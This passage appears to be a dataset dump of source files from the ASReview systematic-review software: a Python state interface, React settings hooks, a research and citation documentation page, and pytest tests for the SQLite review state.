labels of the labeled records as int.\n        notes: list of str/None\n            A list of text notes to save with the labeled records.\n        prior: bool\n            Whether the added records are prior knowledge.\n        \"\"\"\n        raise NotImplementedError\n\n    def update_decision(self, record_id, label, note=None):\n        \"\"\"Change the label of an already labeled record.\n\n        Arguments\n        ---------\n        record_id: int\n            Id of the record whose label should be changed.\n        label: 0 / 1\n            New label of the record.\n        note: str\n            Note to add to the record.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_decision_changes(self):\n        \"\"\"Get the record ids of the records whose labels have been changed\n        after the original labeling action.\"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def get_pool_labeled_pending(self):\n        \"\"\"Return the labeled and unlabeled records and the records pending a\n        labeling decision.\n\n        Returns\n        -------\n        tuple (pd.Series, pd.DataFrame, pd.Series):\n            Returns a tuple (pool, labeled, pending). Pool is a series\n            containing the unlabeled, not pending record_ids, ordered by the\n            last predicted ranking of the model. Labeled is a dataframe\n            containing the record_ids and labels of the labeled records, in the\n            order that they were labeled. 
Pending is a series containing the\n            record_ids of the records whose label is pending.\n        \"\"\"\n        raise NotImplementedError\n\n    def is_empty(self):\n        \"\"\"Check if state has no results.\n\n        Returns\n        -------\n        bool\n            True if empty.\n        \"\"\"\n        return self.n_records_labeled == 0\n\n    @property\n    @abstractmethod\n    def n_records_labeled(self):\n        \"\"\"Number of labeled records.\n\n        Returns\n        -------\n        int\n            Number of labeled records, priors counted individually.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def get_dataset(self, columns=None):\n        \"\"\"Get columns from the results table.\n\n        Arguments\n        ---------\n        columns: list\n            List of column names of the results table.\n\n        Returns\n        -------\n        pd.DataFrame:\n            Dataframe containing the data of the specified columns of the\n            results table.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_order_of_labeling(self):\n        \"\"\"Get the full array of record ids in the order that they were labeled.\n\n        Returns\n        -------\n        pd.Series:\n            The record_ids in the order that they were labeled.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_labels(self):\n        \"\"\"Get the labels from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the labels at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_classifiers(self):\n        \"\"\"Get the classifiers from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the classifier used at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_query_strategies(self):\n        \"\"\"Get the query strategies from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the query strategy used to get the record to\n            query at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_balance_strategies(self):\n        \"\"\"Get the balance strategies from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the balance strategy used to get the training\n            data at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_feature_extraction(self):\n        \"\"\"Get the feature extraction methods from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the feature extraction method used for the\n            classifier input at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_training_sets(self):\n        \"\"\"Get the training_sets from the state file.\n\n        Returns\n        -------\n        pd.Series:\n            Series containing the training set on which the classifier was\n            fit at each labeling moment.\n        \"\"\"\n        raise NotImplementedError\n\n    def get_labeling_times(self, time_format=\"int\"):\n        \"\"\"Get the times of labeling from the state file.\n\n        Arguments\n        ---------\n        time_format: 'int' or 'datetime'\n            Format of the return value. 
If it is 'int' you get a UTC timestamp,\n if it is 'datetime' you get datetime instead of an integer.\n\n Returns\n -------\n pd.Series:\n If format='int' you get a UTC timestamp (integer number of\n microseconds), if it is 'datetime' you get datetime format.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def close(self):\n \"\"\"Close the files opened by the state.\"\"\"\n raise NotImplementedError\n\n def to_dict(self):\n \"\"\"Convert state to dictionary.\n\n Returns\n -------\n dict:\n Dictionary with all settings and results.\n \"\"\"\n state_data = self.get_dataset()\n state_dict = {\"settings\": vars(self.settings), \"data\": state_data.to_dict()}\n return state_dict\n" }, { "alpha_fraction": 0.6620327234268188, "alphanum_fraction": 0.6635773777961731, "avg_line_length": 26.66666603088379, "blob_id": "48461657fdf2db206a8e6eef8c5c61740df7c4e9", "content_id": "3bcace6cdb47d7c5db94284621fbf1bfc8b8b277", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3237, "license_type": "permissive", "max_line_length": 80, "num_lines": 117, "path": "/asreview/webapp/src/hooks/SettingsHooks.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { useEffect, useState } from \"react\";\n\nimport { fontSizeOptions, getDesignTokens } from \"../globals.js\";\n\nconst useRowsPerPage = () => {\n const [rowsPerPage, setRowsPerPage] = useState(5);\n\n const handleRowsPerPage = (rows) => {\n window.localStorage.setItem(\"rowsPerPage\", rows);\n setRowsPerPage(rows);\n };\n\n useEffect(() => {\n const localRowsPerPage = window.localStorage.getItem(\"rowsPerPage\");\n if (localRowsPerPage !== null && rowsPerPage !== localRowsPerPage) {\n setRowsPerPage(parseInt(localRowsPerPage));\n }\n }, [rowsPerPage]);\n\n return [rowsPerPage, handleRowsPerPage];\n};\n\nconst useDarkMode = () => {\n const [theme, setTheme] = useState(getDesignTokens(\"light\"));\n\n const toggleDarkMode = () => {\n if (theme.palette.mode === \"light\") {\n window.localStorage.setItem(\"themeType\", \"dark\");\n setTheme(getDesignTokens(\"dark\"));\n } else {\n window.localStorage.setItem(\"themeType\", \"light\");\n setTheme(getDesignTokens(\"light\"));\n }\n };\n\n useEffect(() => {\n const localTheme = window.localStorage.getItem(\"themeType\");\n if (theme.palette.mode !== localTheme && localTheme !== null) {\n setTheme(getDesignTokens(\"dark\"));\n }\n }, [theme.palette.mode]);\n\n return [theme, toggleDarkMode];\n};\n\nconst useFontSize = () => {\n const [fontSize, setFontSize] = useState(fontSizeOptions[1]);\n\n const handleFontSizeChange = (size) => {\n window.localStorage.setItem(\n \"fontSize\",\n JSON.stringify([size.value, size.label]),\n );\n setFontSize(size);\n };\n\n useEffect(() => {\n const localFontSize = JSON.parse(window.localStorage.getItem(\"fontSize\"));\n if (localFontSize !== null && fontSize.value !== localFontSize[0]) {\n setFontSize({\n value: localFontSize[0],\n label: localFontSize[1],\n });\n }\n }, [fontSize]);\n\n return [fontSize, handleFontSizeChange];\n};\n\nconst useUndoEnabled = () => {\n const [undoEnabled, setUndoEnabled] = useState(true);\n\n const toggleUndoEnabled = () => {\n window.localStorage.setItem(\"undoEnabled\", !undoEnabled);\n setUndoEnabled((a) => !a);\n };\n\n useEffect(() => {\n const localUndoEnabled = window.localStorage.getItem(\"undoEnabled\");\n const localUndoEnabledIsTrue = localUndoEnabled === \"true\";\n if (undoEnabled !== localUndoEnabledIsTrue && localUndoEnabled 
!== null) {\n setUndoEnabled(localUndoEnabledIsTrue);\n }\n }, [undoEnabled]);\n\n return [undoEnabled, toggleUndoEnabled];\n};\n\nconst useKeyPressEnabled = () => {\n const [keyPressEnabled, setKeyPressEnabled] = useState(false);\n\n const toggleKeyPressEnabled = () => {\n window.localStorage.setItem(\"keyPressEnabled\", !keyPressEnabled);\n setKeyPressEnabled((a) => !a);\n };\n\n useEffect(() => {\n const localKeyPressEnabled = window.localStorage.getItem(\"keyPressEnabled\");\n const localKeyPressEnabledIsTrue = localKeyPressEnabled === \"true\";\n if (\n keyPressEnabled !== localKeyPressEnabledIsTrue &&\n localKeyPressEnabled !== null\n ) {\n setKeyPressEnabled(localKeyPressEnabledIsTrue);\n }\n }, [keyPressEnabled]);\n\n return [keyPressEnabled, toggleKeyPressEnabled];\n};\n\nexport {\n useRowsPerPage,\n useDarkMode,\n useFontSize,\n useUndoEnabled,\n useKeyPressEnabled,\n};\n" }, { "alpha_fraction": 0.7676130533218384, "alphanum_fraction": 0.783035397529602, "avg_line_length": 54.94117736816406, "blob_id": "f034e0bd16c7b40f0e140cdc119cef1661665945", "content_id": "f07bf04bf05613d4de630bcdb9bf110f5216b0b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2853, "license_type": "permissive", "max_line_length": 544, "num_lines": 51, "path": "/docs/source/research.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Research\n========\n\nThe open source ASReview LAB software is one of the products of the `ASReview\nresearch project <https://asreview.ai/about/>`_. The ASReview research project\nis a fundamental and applied research project studying the application of AI\nin the field of systematically reviewing large amounts of text data. \n\n \n\n.. note::\n \n The ASReview project is developed by researchers for researchers, and anyone is welcome to join the community!\n\nThere are still 1001 scientific papers that can be published using the\nASReview products. We welcome researchers worldwide to work on papers like\napplying the existing models to new types of datasets (different scientific\nfields, other languages, multilanguage data, text data outside academia,\nlarge datasets, etcetera), adding new models and testing the performance on\nthe available benchmark datasets, adding and testing new stopping rules or\nperformance metrics, and so on! \n\n\nScientific principles\n---------------------\n\nThe research team works according to the Open Science principles and invests in an\ninclusive community contributing to the project. In short, research is\nconducted according to the following fundamental principles:\n\n- Research output should be `FAIR <https://www.uu.nl/en/research/open-science>`_ (Findable Accessible Interoperable and Reusable).\n- Research should be conducted with integrity, and we commit ourselves to the `Netherlands Code of Conduct for Research Integrity <https://www.nwo.nl/en/netherlands-code-conduct-research-integrity>`_.\n- Output should be rewarded according to the Declaration on Research Assessment (`DORA <https://sfdora.org/read/>`_).\n\n\nUtrecht University has established `specific regulations <https://www.uu.nl/en/organisation/about-us/codes-of-conduct>`_ governing conduct for its employees. These are based on the key principles of professional and quality academic conduct and ethically-responsible research. Members of the team employed by Utrecht University, commit themselves to these regulations in all their conduct, including all work related to ASReview. 
Adherence to similar key principles is expected of all researchers involved in all facets of the ASReview project.\n\nCite\n----\n\nFor scientific use, we encourage users to cite:\n\n- The paper published in `Nature Machine Intelligence <https://www.nature.com/articles/s42256-020-00287-7>`_ to cite the **ASReview project**.\n\n- For citing the software **ASReview LAB**, refer to the `specific release\n  <https://doi.org/10.5281/zenodo.3345592>`_ of the software. The menu on the\n  right (in Zenodo) can be used to find the citation format of preference.\n\n- For citing the documentation (or to download the pdf) go to `Zenodo <https://doi.org/10.5281/zenodo.4287119>`_.\n\n- More studies related to the project can be found on `asreview.ai/research <https://asreview.ai/research/>`_.\n" }, { "alpha_fraction": 0.5878220200538635, "alphanum_fraction": 0.6256759762763977, "avg_line_length": 33.48604965209961, "blob_id": "a4106fd37be93a382ec4da2ac8f67d755f49c173", "content_id": "c1d75195aef88d7ad7f3822f97dbb02f95ae4e07", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23485, "license_type": "permissive", "max_line_length": 88, "num_lines": 681, "path": "/tests/test_state.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom sqlite3 import OperationalError\n\nimport pandas as pd\nimport pytest\nfrom scipy.sparse import csr_matrix\n\nfrom asreview import ASReviewData\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state import SQLiteState\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import RESULTS_TABLE_COLUMNS\n\nTEST_LABELS = [1, 0, 0, 1, 1, 1, 0, 1, 1, 1]\nTEST_INDICES = [16, 346, 509, 27, 11, 555, 554, 680, 264, 309]\nTEST_RECORD_IDS = [17, 347, 510, 28, 12, 556, 555, 681, 265, 310]\nTEST_RECORD_TABLE = list(range(851))\nTEST_CLASSIFIERS = [None, None, None, None, \"nb\", \"nb\", \"nb\", \"nb\", \"nb\", \"nb\"]\nTEST_QUERY_STRATEGIES = [\n    \"prior\",\n    \"prior\",\n    \"prior\",\n    \"prior\",\n    \"max\",\n    \"max\",\n    \"max\",\n    \"max\",\n    \"max\",\n    \"max\",\n]\nTEST_BALANCE_STRATEGIES = [\n    None,\n    None,\n    None,\n    None,\n    \"double\",\n    \"double\",\n    \"double\",\n    \"double\",\n    \"double\",\n    \"double\",\n]\nTEST_FEATURE_EXTRACTION = [\n    None,\n    None,\n    None,\n    None,\n    \"tfidf\",\n    \"tfidf\",\n    \"tfidf\",\n    \"tfidf\",\n    \"tfidf\",\n    \"tfidf\",\n]\nTEST_TRAINING_SETS = [-1, -1, -1, -1, 4, 5, 6, 7, 8, 9]\nTEST_NOTES = [\n    None,\n    None,\n    None,\n    \"random text\",\n    \"another random text\",\n    None,\n    None,\n    \"A final random text\",\n    None,\n    None,\n]\n\nTEST_N_PRIORS = 4\nTEST_N_MODELS = 7\n\nTEST_STATE_FP = Path(\"tests\", \"asreview_files\", \"test_state_example_converted.asreview\")\nTEST_WITH_TIMES_FP = Path(\n    \"tests\", \"asreview_files\", \"test_state_example_with_times.asreview\"\n)\nTEST_LABELING_TIMES = [\n    \"2021-09-30 17:54:07.569255\",\n    \"2021-09-30 17:54:07.569255\",\n    \"2021-09-30 17:54:28.860270\",\n    \"2021-09-30 17:54:28.860270\",\n    \"2021-09-30 17:54:28.860270\",\n    \"2021-09-30 17:54:31.689389\",\n    \"2021-09-30 17:54:33.505257\",\n    \"2021-09-30 17:54:35.842416\",\n    \"2021-09-30 17:54:38.245108\",\n]\n\nTEST_FIRST_PROBS = [\n    0.7107394917661797,\n    0.7291694332065035,\n    0.732624685298732,\n    0.7017866934752249,\n    0.7275304788204621,\n    0.7126109527686055,\n    0.7246720268636593,\n    
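# reference probabilities as stored in the bundled example state file (TEST_STATE_FP)\n    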
0.7040374218528891,\n 0.7095665447517838,\n 0.7021937381372063,\n]\nTEST_LAST_PROBS = [\n 0.7116408177006979,\n 0.7119557616570122,\n 0.71780127925996,\n 0.7127075014419986,\n 0.7085644453092131,\n 0.7067520535764322,\n 0.7103161247883791,\n 0.7192568428839242,\n 0.7118104532649111,\n 0.7150387267232563,\n]\nTEST_POOL_START = [157, 301, 536, 567, 416, 171, 659, 335, 329, 428]\n\n\ndef test_init_project_folder(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n project = ASReviewProject.create(project_path)\n\n assert Path(project_path, \"project.json\").is_file()\n assert Path(project_path, \"data\").is_dir()\n assert Path(project_path, \"feature_matrices\").is_dir()\n assert Path(project_path, \"reviews\").is_dir()\n\n assert project.config[\"id\"] == \"test\"\n\n\ndef test_init_project_already_exists(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with pytest.raises(ProjectExistsError):\n ASReviewProject.create(project_path)\n\n\ndef test_invalid_project_folder():\n with pytest.raises(StateNotFoundError):\n with open_state(\"this_is_not_a_project\") as state: # noqa\n pass\n\n\ndef test_state_not_found(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with pytest.raises(StateNotFoundError):\n with open_state(project_path) as state: # noqa\n pass\n\n\ndef test_read_basic_state():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state, SQLiteState)\n\n\ndef test_version_number_state():\n with open_state(TEST_STATE_FP) as state:\n assert state.version[0] == \"1\"\n\n\ndef test_write_while_read_only_state():\n with open_state(TEST_STATE_FP, read_only=True) as state:\n with pytest.raises(OperationalError):\n state.add_last_probabilities([1.0] * len(TEST_RECORD_TABLE))\n\n\ndef test_print_state():\n with open_state(TEST_STATE_FP, read_only=True) as state:\n print(state)\n\n\ndef test_settings_state():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.settings, ASReviewSettings)\n\n\ndef test_n_records_labeled():\n with open_state(TEST_STATE_FP) as state:\n assert state.n_records_labeled == len(TEST_LABELS)\n\n\ndef test_n_priors():\n with open_state(TEST_STATE_FP) as state:\n assert state.n_priors == TEST_N_PRIORS\n\n\ndef test_create_new_state_file(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state._is_valid_state()\n\n\ndef test_get_dataset():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_dataset([\"query_strategy\"]), pd.DataFrame)\n assert isinstance(state.get_dataset(), pd.DataFrame)\n\n # Try getting a specific column.\n assert (\n state.get_dataset([\"record_id\"])[\"record_id\"].to_list() == TEST_RECORD_IDS\n )\n assert (\n state.get_dataset([\"feature_extraction\"])[\"feature_extraction\"].to_list()\n == TEST_FEATURE_EXTRACTION\n )\n # Try getting all columns and that picking the right column.\n assert (\n state.get_dataset()[\"balance_strategy\"].to_list() == TEST_BALANCE_STRATEGIES\n )\n # Try getting a specific column with column name as string, instead of\n # list containing column name.\n assert (\n state.get_dataset(\"training_set\")[\"training_set\"].to_list()\n == TEST_TRAINING_SETS\n )\n\n\ndef test_get_dataset_drop_prior():\n with open_state(TEST_STATE_FP) as state:\n assert (\n len(state.get_dataset(priors=False)) == len(TEST_RECORD_IDS) - TEST_N_PRIORS\n )\n assert 
(state.get_dataset(priors=False)[\"query_strategy\"] != \"prior\").all()\n assert \"query_strategy\" in state.get_dataset(priors=False).columns\n assert \"query_strategy\" not in state.get_dataset(\"label\", priors=False)\n\n\ndef test_get_dataset_drop_pending(tmpdir):\n record_table = range(1, 11)\n test_ranking = range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_table)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n state.query_top_ranked(3)\n\n assert \"label\" in state.get_dataset(pending=False).columns\n assert \"label\" not in state.get_dataset(\"balance_strategy\", pending=False)\n assert len(state.get_dataset(pending=False)) == 3\n assert state.get_dataset(pending=False)[\"label\"].notna().all()\n\n\ndef test_get_data_by_query_number():\n with open_state(TEST_STATE_FP) as state:\n query = state.get_data_by_query_number(0)\n assert list(query.columns) == RESULTS_TABLE_COLUMNS\n assert (\n query[\"balance_strategy\"].tolist()\n == TEST_BALANCE_STRATEGIES[:TEST_N_PRIORS]\n )\n assert query[\"classifier\"].tolist() == TEST_CLASSIFIERS[:TEST_N_PRIORS]\n\n for query_num in [1, 3, 5]:\n query_idx = query_num + TEST_N_PRIORS - 1\n query = state.get_data_by_query_number(query_num)\n assert isinstance(query, pd.DataFrame)\n assert (\n query[\"feature_extraction\"].to_list()[0]\n == TEST_FEATURE_EXTRACTION[query_idx]\n )\n assert query[\"label\"].to_list()[0] == TEST_LABELS[query_idx]\n assert query[\"record_id\"].to_list()[0] == TEST_RECORD_IDS[query_idx]\n\n columns = RESULTS_TABLE_COLUMNS[2:5]\n query = state.get_data_by_query_number(4, columns)\n assert list(query.columns) == columns\n\n\ndef test_get_data_by_record_id():\n with open_state(TEST_STATE_FP) as state:\n for idx in [2, 6, 8]:\n record_id = TEST_RECORD_IDS[idx]\n query = state.get_data_by_record_id(record_id)\n assert isinstance(query, pd.DataFrame)\n assert query[\"training_set\"].to_list()[0] == TEST_TRAINING_SETS[idx]\n assert query[\"record_id\"].to_list()[0] == TEST_RECORD_IDS[idx]\n\n\ndef test_get_query_strategies():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_query_strategies(), pd.Series)\n assert state.get_query_strategies().to_list() == TEST_QUERY_STRATEGIES\n\n\ndef test_get_classifiers():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_classifiers(), pd.Series)\n assert state.get_classifiers().to_list() == TEST_CLASSIFIERS\n\n\ndef test_get_training_sets():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_training_sets(), pd.Series)\n assert all(state.get_training_sets() == TEST_TRAINING_SETS)\n\n\ndef test_get_order_of_labeling():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_order_of_labeling(), pd.Series)\n assert all(state.get_order_of_labeling() == TEST_RECORD_IDS)\n\n\ndef test_get_labels():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_labels(), pd.Series)\n assert all(state.get_labels() == TEST_LABELS)\n\n\ndef test_get_labels_no_priors():\n with open_state(TEST_STATE_FP) as state:\n labels = state.get_labels(priors=False)\n assert isinstance(labels, pd.Series)\n assert all(labels == TEST_LABELS[4:])\n\n\ndef test_get_labeling_times():\n with open_state(TEST_WITH_TIMES_FP) as state:\n assert isinstance(state.get_labeling_times(), 
pd.Series)\n assert all(state.get_labeling_times() == TEST_LABELING_TIMES)\n\n\ndef test_create_empty_state(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n assert state.is_empty()\n\n\ndef test_get_feature_matrix():\n project = ASReviewProject(TEST_STATE_FP)\n\n assert len(project.feature_matrices) == 1\n\n feature_matrix = project.get_feature_matrix(project.feature_matrices[0][\"id\"])\n assert isinstance(feature_matrix, csr_matrix)\n\n\ndef test_get_record_table():\n with open_state(TEST_STATE_FP) as state:\n record_table = state.get_record_table()\n assert isinstance(record_table, pd.Series)\n assert record_table.name == \"record_id\"\n assert record_table.to_list() == TEST_RECORD_TABLE\n\n\ndef test_record_table(tmpdir):\n data_fp = Path(\"tests\", \"demo_data\", \"record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(as_data.record_ids)\n assert state.get_record_table().to_list() == list(range(len(as_data)))\n\n\ndef test_get_last_probabilities():\n with open_state(TEST_STATE_FP) as state:\n probabilities = state.get_last_probabilities()\n assert isinstance(probabilities, pd.Series)\n assert probabilities.name == \"proba\"\n assert probabilities.to_list()[:10] == TEST_FIRST_PROBS\n assert probabilities.to_list()[-10:] == TEST_LAST_PROBS\n\n\ndef test_add_last_probabilities_fail():\n with open_state(TEST_STATE_FP) as state:\n with pytest.raises(ValueError):\n state.add_last_probabilities([1.0, 2.0, 3.0])\n\n\ndef test_add_last_probabilities(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n probabilities = [float(num) for num in range(50)]\n with open_state(project_path, read_only=False) as state:\n state.add_last_probabilities(probabilities)\n state_probabilities = state.get_last_probabilities().to_list()\n assert state_probabilities == probabilities\n\n\ndef test_move_ranking_data_to_results(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(\n range(1, len(TEST_RECORD_TABLE) + 1), \"nb\", \"max\", \"double\", \"tfidf\", 4\n )\n state._move_ranking_data_to_results([4, 6, 5, 7])\n\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == [4, 6, 5, 7]\n assert data[\"label\"].to_list() == [None] * 4\n assert data[\"classifier\"].to_list() == [\"nb\"] * 4\n\n\ndef test_query_top_ranked(tmpdir):\n test_ranking = [2, 1, 0] + list(range(3, len(TEST_RECORD_TABLE)))\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n top_ranked = state.query_top_ranked(5)\n\n assert top_ranked == [2, 1, 0, 3, 4]\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == [2, 1, 0, 3, 4]\n assert data[\"classifier\"].to_list() == [\"nb\"] * 5\n assert data[\"query_strategy\"].to_list() == [\"max\"] * 5\n assert data[\"balance_strategy\"].to_list() == [\"double\"] * 5\n assert data[\"feature_extraction\"].to_list() == [\"tfidf\"] * 5\n 
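# training_set echoes the value 4 passed to add_last_ranking above\n    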
assert data[\"training_set\"].to_list() == [4] * 5\n\n\ndef test_add_labeling_data(tmpdir):\n test_ranking = list(range(len(TEST_RECORD_TABLE)))\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n for i in range(3):\n # Test without specifying notes.\n state.add_labeling_data([TEST_RECORD_IDS[i]], [TEST_LABELS[i]], prior=True)\n\n # Test with specifying notes and with larger batch.\n state.add_labeling_data(\n TEST_RECORD_IDS[3:6], TEST_LABELS[3:6], notes=TEST_NOTES[3:6], prior=True\n )\n\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == TEST_RECORD_IDS[:6]\n assert data[\"label\"].to_list() == TEST_LABELS[:6]\n assert data[\"classifier\"].to_list() == [None] * 6\n assert data[\"query_strategy\"].to_list() == [\"prior\"] * 6\n assert data[\"balance_strategy\"].to_list() == [None] * 6\n assert data[\"feature_extraction\"].to_list() == [None] * 6\n assert data[\"training_set\"].to_list() == [-1] * 6\n assert data[\"notes\"].to_list() == TEST_NOTES[:6]\n\n state.query_top_ranked(3)\n data = state.get_dataset(pending=True)\n assert data[\"label\"].to_list()[:6] == TEST_LABELS[:6]\n assert data[\"label\"][6:].isna().all()\n assert data[\"record_id\"].to_list() == TEST_RECORD_IDS[:6] + [0, 1, 2]\n\n state.add_labeling_data([1], [1])\n labels = state.get_labels(pending=True)\n assert labels.to_list()[:6] == TEST_LABELS[:6]\n assert labels[7] == 1\n\n state.add_labeling_data([0, 2], [0, 1], notes=[\"note0\", \"note2\"])\n data = state.get_dataset(pending=True)\n assert data[\"label\"].to_list() == TEST_LABELS[:6] + [0, 1, 1]\n assert data[\"notes\"].to_list() == TEST_NOTES[:6] + [\"note0\", None, \"note2\"]\n\n\ndef test_pool_labeled_pending(tmpdir):\n record_table = range(1, 11)\n test_ranking = range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_table)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n state.query_top_ranked(3)\n\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert isinstance(pool, pd.Series)\n assert isinstance(labeled, pd.DataFrame)\n assert isinstance(pending, pd.Series)\n\n assert pool.name == \"record_id\"\n assert pending.name == \"record_id\"\n assert list(labeled.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list() == [7, 3, 2, 1]\n assert labeled[\"record_id\"].to_list() == [4, 5, 6]\n assert labeled[\"label\"].to_list() == [1, 0, 1]\n assert pending.to_list() == [10, 9, 8]\n\n pool2 = state.get_pool()\n labeled2 = state.get_labeled()\n pending2 = state.get_pending()\n\n assert isinstance(pool2, pd.Series)\n assert isinstance(labeled2, pd.DataFrame)\n assert isinstance(pending2, pd.Series)\n\n assert pool2.name == \"record_id\"\n assert pending2.name == \"record_id\"\n assert list(labeled2.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list() == pool2.to_list()\n assert labeled[\"record_id\"].to_list() == labeled2[\"record_id\"].to_list()\n assert labeled[\"label\"].to_list() == labeled2[\"label\"].to_list()\n assert pending.to_list() == pending2.to_list()\n\n\ndef test_exist_new_labeled_records(tmpdir):\n record_table = range(1, 11)\n test_ranking 
= range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_table)\n\n assert not state.exist_new_labeled_records\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n assert state.exist_new_labeled_records\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 3)\n assert not state.exist_new_labeled_records\n state.query_top_ranked(3)\n assert not state.exist_new_labeled_records\n state.add_labeling_data([8, 9, 10], [1, 1, 1])\n assert state.exist_new_labeled_records\n\n\ndef test_add_note(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_labeling_data(\n TEST_RECORD_IDS[:3], TEST_LABELS[:3], TEST_NOTES[:3], prior=True\n )\n\n note = \"An added note\"\n record_id = TEST_RECORD_IDS[1]\n state.add_note(note, record_id)\n record_data = state.get_data_by_record_id(record_id)\n assert record_data[\"notes\"][0] == note\n\n\ndef test_update_decision(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_labeling_data(TEST_RECORD_IDS[:3], TEST_LABELS[:3], prior=True)\n\n for i in range(3):\n state.update_decision(TEST_RECORD_IDS[i], 1 - TEST_LABELS[i])\n new_label = state.get_data_by_record_id(TEST_RECORD_IDS[i])[\"label\"][0]\n assert new_label == 1 - TEST_LABELS[i]\n\n state.update_decision(TEST_RECORD_IDS[1], TEST_LABELS[1])\n new_label = state.get_data_by_record_id(TEST_RECORD_IDS[1])[\"label\"][0]\n assert new_label == TEST_LABELS[1]\n\n change_table = state.get_decision_changes()\n changed_records = TEST_RECORD_IDS[:3] + [TEST_RECORD_IDS[1]]\n new_labels = [1 - x for x in TEST_LABELS[:3]] + [TEST_LABELS[1]]\n\n assert change_table[\"record_id\"].to_list() == changed_records\n assert change_table[\"new_label\"].to_list() == new_labels\n\n\ndef test_get_pool_labeled():\n with open_state(TEST_STATE_FP) as state:\n pool, labeled, _ = state.get_pool_labeled_pending()\n\n assert isinstance(pool, pd.Series)\n assert pool.name == \"record_id\"\n assert isinstance(labeled, pd.DataFrame)\n assert list(labeled.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list()[:10] == 